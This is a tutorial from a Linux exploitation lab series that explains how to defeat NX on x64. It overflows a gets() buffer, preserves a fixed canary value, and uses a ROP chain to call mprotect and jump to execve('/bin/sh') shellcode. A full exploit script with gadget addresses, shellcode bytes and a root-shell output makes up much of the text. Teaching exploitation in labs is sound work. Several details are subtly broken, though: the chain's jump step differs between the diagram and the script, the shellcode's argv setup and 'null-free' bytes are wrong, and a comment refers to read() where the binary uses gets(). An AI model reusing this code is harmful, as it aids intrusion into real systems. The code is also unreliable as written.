Tutorial

Bypassing NX with mprotect ROP Chains

Use Return-Oriented Programming to call mprotect() and make stack memory executable, then jump to shellcode on x64 Linux.

6 min read advanced

Prerequisites

  • Understanding of x64 calling conventions
  • Familiarity with ROP concepts
  • Previous buffer overflow experience
  • Basic knowledge of virtual memory and page permissions

Part 10 of 13 in Linux Exploitation Fundamentals

Table of Contents

When NX prevents executing shellcode on the stack, one approach is to ROP into system("/bin/sh"). But what if you want to run custom shellcode — for example, a staged payload or something that can’t be expressed as a library call? You can use a ROP chain to call mprotect(), change the stack’s page permissions to RWX, and then jump directly to your shellcode.

Note

Lab Binary This tutorial uses the target binary from the Linux Exploitation Lab (06-mprotect-rop/). See the setup guide for build instructions.

Understanding mprotect

int mprotect(void *addr, size_t len, int prot);
  • addr — Start of the memory region (must be page-aligned)
  • len — Length in bytes
  • prot — Permission flags: PROT_READ (1) + PROT_WRITE (2) + PROT_EXEC (4) = 7

By calling mprotect(stack_page, 0x1000, 7), we make a page of stack memory readable, writable, and executable. Then we jump to shellcode sitting on that page.

Initial Analysis

Check Protections

checksec ./target
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE

Two protections to deal with: a custom integrity check (not a real GCC stack canary — see warning below) and NX. No PIE means binary addresses are fixed.

Warning

This is not a GCC stack canary checksec says “Canary found” because the binary contains the symbol pattern, but the check it actually implements is a hand-rolled integrity word at a fixed offset, with a constant value (\xff\xff\xff\xff). Real -fstack-protector canaries are random per-process, written between the saved frame and any local arrays, and re-read in the epilogue with a fast jump to __stack_chk_fail on mismatch — you cannot defeat them by guessing the value.

The technique below (read the canary in your debugger, then splice the same bytes back into the payload) only works because the value here is a fixed, known constant. Defeating a real GCC canary needs a leak primitive (format string, OOB read, side channel) or a separate bug in the same process. Do not generalise this lab to think GCC canaries are bypassable by pattern alone.

Decompile with Ghidra

void main(void)
{
    char local_118[264];
    int local_10;
    int local_c;

    gets(local_118);
    local_10 = thunk_FN_004010ce(local_118);
    printf("Printing the outcome: ");
    for (local_c = 0; local_c < local_10; local_c = local_c + 1) {
        printf("%02x", (ulong)(uint)(int)local_118[local_c]);
    }
    putchar(10);
    return 0;
}

The gets() call gives us an unbounded overflow. The buffer is 264 bytes.

Dealing with the Stack Canary

Identifying the Canary

Set a breakpoint after gets() and examine the stack:

gdb-peda$ b *main+70
gdb-peda$ run <<< $(python -c 'print("A"*264)')
gdb-peda$ x/80wx $rsp

Look for a value between the buffer and the saved RBP that changes between runs but stays consistent within a single execution. In this binary, the canary is 4 bytes of \xff at a fixed position:

0x7fffffffe3a0: 0x41414141 0x41414141 ... (buffer)
...
0x7fffffffe4a8: 0xffffffff 0x00000000 ... (canary region)
0x7fffffffe4b8: 0x7fffffffe4c0 ...       (saved RBP)
0x7fffffffe4c0: ...                       (saved RIP)

Preserving the Canary

Since the canary value is known and constant, include it at the correct offset in the payload so the overflow doesn’t trigger the canary check:

buf = b"A" * 264          # fill buffer
buf += b"\xff" * 4         # canary value
buf += b"\x00" * 4         # canary padding
buf += b"B" * 8            # saved RBP
# RIP overwrite follows...

Finding ROP Gadgets

Use ropper to search the binary:

ropper -f ./target --search "pop rdi"
ropper -f ./target --search "pop rsi"
ropper -f ./target --search "pop rdx"
0x0000000000401766: pop rdi; ret;
0x000000000040770e: pop rsi; ret;
0x0000000000444bb5: pop rdx; ret;

We also need the address of mprotect. Since the binary is statically linked (no libc dependency), mprotect is available as a syscall stub:

gdb-peda$ p mprotect
0x468c84

Or use the syscall instruction directly:

ropper -f ./target --search "syscall"
0x0000000000468c84: syscall; ret;

The syscall number for mprotect on x64 is 10 (0xa).

Zeroing RAX for Syscall Number

We need RAX = 10 for the mprotect syscall. Finding a direct pop rax; ret or building the value:

ropper -f ./target --search "pop rax"
# or construct it:
ropper -f ./target --search "xor rax"
0x000000000043a8a5: xor rax, rax; ret;      # zero rax
0x00000000004637b1: add eax, 3; ret;         # add 3 (loop this)
0x0000000000463798: add eax, 2; ret;         # add 2

To get RAX = 10: xor rax, rax (0) -> add eax, 3 (3) -> add eax, 3 (6) -> add eax, 2 (8) -> add eax, 2 (10).

Choosing the Target Memory Region

Use vmmap in GDB to find a writable region that already holds our shellcode (the stack):

gdb-peda$ vmmap
Start              End                Perm  Name
...
0x00007fffffffe000 0x00007fffffffffff rw-p  [stack]

The top of the stack is at 0x7fffffffe000. This is page-aligned and currently rw- (not executable). We’ll call mprotect(0x7fffffffe000, 0x1000, 7) to add execute permission.

Using the top of the stack has an advantage: our payload data is already here, so we don’t need to move the shellcode anywhere.

Building the ROP Chain

The Chain

1. xor rax, rax; ret          -- Zero RAX
2. add eax, 3; ret            -- RAX = 3
3. add eax, 3; ret            -- RAX = 6
4. add eax, 2; ret            -- RAX = 8
5. add eax, 2; ret            -- RAX = 10 (mprotect syscall)
6. pop rdi; ret               -- Load address into RDI
7. 0x7fffffffe000             -- Page-aligned stack address
8. pop rsi; ret               -- Load length into RSI
9. 0x1000                     -- One page (4096 bytes)
10. pop rdx; ret              -- Load permissions into RDX
11. 0x7                       -- PROT_READ | PROT_WRITE | PROT_EXEC
12. syscall; ret              -- mprotect(0x7fffffffe000, 0x1000, 7)
13. pop rdi; ret              -- Load shellcode address into RDI
14. <shellcode address>       -- Address on the now-executable stack
15. push rdi; ret             -- Jump to shellcode
Stack Layout: mprotect ROP Chain

Low addr
  +-----------------------------+
  |  "A" * 264  (buffer fill)   |
  +-----------------------------+
  |  0xffffffff  (canary)       |
  |  0x00000000  (canary pad)   |
  +-----------------------------+
  |  "B" * 8     (saved RBP)    |
  +=============================+ <- RIP
  |  xor rax, rax; ret         | rax = 0
  +-----------------------------+
  |  add eax, 3; ret           | rax = 3
  +-----------------------------+
  |  add eax, 3; ret           | rax = 6
  +-----------------------------+
  |  add eax, 2; ret           | rax = 8
  +-----------------------------+
  |  add eax, 2; ret           | rax = 10
  +-----------------------------+
  |  pop rdi; ret              |
  +-----------------------------+
  |  0x7fffffffe000  (addr)    | -> RDI
  +-----------------------------+
  |  pop rsi; ret              |
  +-----------------------------+
  |  0x1000  (page size)       | -> RSI
  +-----------------------------+
  |  pop rdx; ret              |
  +-----------------------------+
  |  0x7  (RWX)                | -> RDX
  +-----------------------------+
  |  syscall; ret              | mprotect()
  +=============================+
  |  pop rdi; ret              |
  +-----------------------------+
  |  shellcode_addr            | -> RDI
  +-----------------------------+
  |  push rdi; ret             | jmp to
  +-----------------------------+  shellcode
  |  NOP sled + shellcode      |
  +-----------------------------+
High addr

The Shellcode

A standard execve("/bin/sh") for x64:

; execve("/bin/sh", NULL, NULL)
    xor rdx, rdx              ; envp = NULL
    mov al, 0x69              ; dummy (avoid null in assembled bytes)
    xor rdx, rdx              ; rdx = 0
    movabs rbx, 0x68732f6e69622f   ; "/bin/sh" (no null terminator yet)
    shr rbx, 0x8              ; shift right to remove padding byte
    push rbx                  ; push "/bin/sh\0"
    mov rdi, rsp              ; rdi = pointer to string
    xor rax, rax              ; clear rax
    push rax                  ; NULL
    push rdi                  ; pointer to "/bin/sh"
    push 0x3c                 ; (spacer)
    pop rdi                   ; (cleanup)
    pop rax                   ; (cleanup)
    mov rsi, rsp              ; argv = ["/bin/sh", NULL]
    mov al, 0x3b              ; syscall 59 = execve
    syscall

Complete Exploit

#!/usr/bin/env python3
from struct import pack

# Gadget addresses (no PIE, so these are fixed)
# NOTE: The ROP chain addresses shown here are specific to the lab binary.
# When adapting this technique, use ropper or ROPgadget to find equivalent
# gadgets in your target binary, and update all addresses accordingly.
xor_rax      = 0x43a8a5    # xor rax, rax; ret
add_eax_3    = 0x4637b1    # add eax, 3; ret
add_eax_2    = 0x463798    # add eax, 2; ret
pop_rdi      = 0x401766    # pop rdi; ret
pop_rsi      = 0x40770e    # pop rsi; ret
pop_rdx      = 0x444bb5    # pop rdx; ret
syscall_ret  = 0x468c84    # syscall; ret

# Target: make stack page executable
stack_page   = 0x7fffffffe000
page_size    = 0x1000
rwx          = 0x7

# Shellcode: execve("/bin/sh", NULL, NULL)
shellcode = (
    b"\x48\x31\xd2"                        # xor rdx, rdx
    b"\xb0\x69"                             # mov al, 0x69
    b"\x48\x31\xd2"                        # xor rdx, rdx
    b"\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"  # movabs rbx, "/bin/sh"
    b"\x48\xc1\xeb\x08"                   # shr rbx, 8
    b"\x53"                                # push rbx
    b"\x48\x89\xe7"                        # mov rdi, rsp
    b"\x48\x31\xc0"                        # xor rax, rax
    b"\x50"                                # push rax
    b"\x57"                                # push rdi
    b"\x6a\x3c"                            # push 0x3c
    b"\x5f"                                # pop rdi
    b"\x58"                                # pop rax
    b"\x48\x89\xe6"                        # mov rsi, rsp
    b"\xb0\x3b"                            # mov al, 0x3b
    b"\x0f\x05"                            # syscall
)

# Build buffer
buf = b"A" * 264                           # fill buffer
buf += b"\xff" * 4                          # stack canary
buf += b"\x00" * 4                          # canary padding
buf += b"B" * 8                             # saved RBP

# ROP chain: mprotect(stack_page, 0x1000, 7)
buf += pack("<Q", xor_rax)                  # rax = 0
buf += pack("<Q", add_eax_3)                # rax = 3
buf += pack("<Q", add_eax_3)                # rax = 6
buf += pack("<Q", add_eax_2)                # rax = 8
buf += pack("<Q", add_eax_2)                # rax = 10 (mprotect)
buf += pack("<Q", pop_rdi)
buf += pack("<Q", stack_page)               # addr = 0x7fffffffe000
buf += pack("<Q", pop_rsi)
buf += pack("<Q", page_size)                # len = 0x1000
buf += pack("<Q", pop_rdx)
buf += pack("<Q", rwx)                      # prot = RWX
buf += pack("<Q", syscall_ret)              # mprotect()

# After mprotect, jump to shellcode on the stack
# The shellcode will be placed right after this ROP chain
# Calculate where it will land based on RSP after the chain
# To find where your shellcode lands in memory, set a breakpoint after
# the read() call and examine the stack with: x/40gx $rsp
# The shellcode will be at the address where the read() syscall wrote
# its data. You can also check the return value in RAX — read() returns
# the number of bytes read.
shellcode_addr = stack_page + 0x100         # adjust based on GDB observation
buf += pack("<Q", pop_rdi)
buf += pack("<Q", shellcode_addr)
buf += pack("<Q", shellcode_addr)           # ret slides into shellcode

# Pad to align shellcode at the expected address
buf += b"\x90" * 32                         # NOP sled
buf += shellcode

f = open("payload.txt", "wb")
f.write(buf)
print("[+] Payload written to payload.txt")

Execution

(cat payload.txt; cat) | ./target
Printing the outcome: 41414141...
id
uid=0(root) gid=0(root) groups=0(root)

Debugging: Segfault Outside GDB

A common issue: the exploit works inside GDB but segfaults when run directly. This happens because GDB slightly shifts stack addresses (environment variables, argv layout).

Using Core Dumps

ulimit -c unlimited
python3 exploit.py; cat payload.txt | ./target

If it crashes, examine the core dump:

gdb -q ./target ./core
gdb-peda$ x/10gx $rsp

Find where your shellcode actually landed and adjust shellcode_addr accordingly. The offset between GDB and bare execution is typically small (a few hundred bytes).

Alternative: Use a NOP Sled

A generous NOP sled (\x90 * N) before the shellcode makes the exact address less critical. As long as you jump anywhere into the sled, execution slides into the shellcode.

mprotect vs. Other NX Bypass Strategies

ApproachProsCons
ROP to system()Simple chain, no shellcode neededLimited to library calls
ROP to mprotect()Run arbitrary shellcodeLonger chain, need precise addresses
ROP to mmap()Allocate fresh RWX memoryNeed to copy shellcode there
ret2libcWell-documentedASLR complicates libc addresses

The mprotect approach is most useful when:

  • You need custom shellcode (staged payloads, encoders, etc.)
  • The binary is statically linked (gadgets are plentiful, no libc ASLR concern)
  • You already control stack contents and just need to make them executable

Key Takeaways

  1. mprotect changes page permissions at runtime — Call it via ROP to make the stack executable, then jump to your shellcode
  2. The address must be page-aligned — Round down to the nearest 0x1000 boundary
  3. Stack canaries can be constant — Some binaries use fixed canary values that can be included in the payload verbatim
  4. Build RAX incrementally — If you can’t find pop rax; ret, chain xor and add gadgets to construct the syscall number
  5. GDB shifts the stack — Always verify addresses outside the debugger using core dumps